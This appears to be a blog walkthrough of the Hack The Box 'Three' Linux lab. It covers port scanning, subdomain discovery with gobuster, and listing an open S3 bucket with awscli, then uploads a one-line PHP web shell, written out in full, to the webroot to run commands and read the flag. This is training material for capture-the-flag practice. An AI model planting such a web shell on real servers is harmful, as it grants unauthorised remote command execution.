Three - Linux
- justinblawitz
- Oct 8, 2025
- 3 min read
First ping and Nmap the target Ip using sudo nmap -sV {target Ip}

We find port 22/tcp open, and port 80/tcp open running a web server. Searching the target Ip on a browser leads us to a band’s web page, we can tell the “Contact” form is sending requests to a php server from the source code.


On the “Contact” page, we see the domain thetoppers.htb in an email address giving us the domain name.

We’ll next add an entry for thetoppers.htb in /etc/hosts to be able to access the domain in the browser using echo "{target Ip} thetoppers.htb" | sudo tee -a /etc/hosts.

Then use gobuster to look for subdomains of the web page. A subdomain name is a piece of additional information added to the beginning of a website’s domain name. It allows websites to separate and organize content for a specific function. For instance, in ctf.hackthebox.com, ctf is the subdomain, hackthebox is the primary domain and .com is the top-level domain (TLD). Run the command gobuster vhost -w (wordlist file path) -u http://thetoppers.htb --append-domain, vhost runs Gobuster in vhost (virtual host) discovery mode, -w specifies the wordlist, -u connects gobuster to the specified web page, and –append-domain tells gobuster to add the subdomain to the existing domain name, so word.thetoppers.htb.

This command reveals the s3.thetoppers.htb domain. We can add an entry for this sub-domain in the /etc/hosts file using echo "{target Ip} s3.thetoppers.htb" | sudo tee -a /etc/hosts.

Now, searching http://s3.thetoppers.htb leads us to a new page displaying {“status”: “running”}. A quick google search on s3 tells us Amazon s3 is a cloud object storage service that allows us to store things in containers called buckets. AWS S3 buckets have various use-cases including Backup and Storage, Media Hosting, Software Delivery, Static Website etc. The files stored in the Amazon S3 bucket are called S3 objects.

We can install aws on Linux using sudo apt install awscli and configure it using aws configure, and arbitrary (random) values as sometimes servers aren’t configured correctly. In this case I used “temp”.

Next we’ll run aws --endpoint=http://s3.thetoppers.htb s3 ls which lists all of the S3 buckets hosted by the server by using the ls command, and aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb which lists objects and common prefixes under the specified bucket.

Looking at the files index.php, .htaccess, and the images directory in the specified bucket, it seems like this is the webroot (main directory on a web server where public web content (like HTML, CSS, JS, and images) is stored and served to visitors) of the website using Apache running on port 80.
Awscli also allows us to copy files to a remote bucket. We already know that the website is using PHP. Thus, we can try uploading a PHP shell file to the S3 bucket and since it's uploaded to the webroot directory we can visit this webpage in the browser. We do this by writing a php file using nano shell.php, and entering <?php system($_GET[‘cmd’]); ?>


Then we’ll upload this file to the web server using aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb where cp shell.php s3://thetoppers.htb specifies to copy the shell.php file to thetoppers.thb bucket. We can then list the objects again to confirm it was uploaded.

This allows us to essentially use the search bar on the browser as a command line, we can navigate files using ls and ../ to eventually find the flag.txt. We can finally use cat on the file to read and capture the flag.




Comments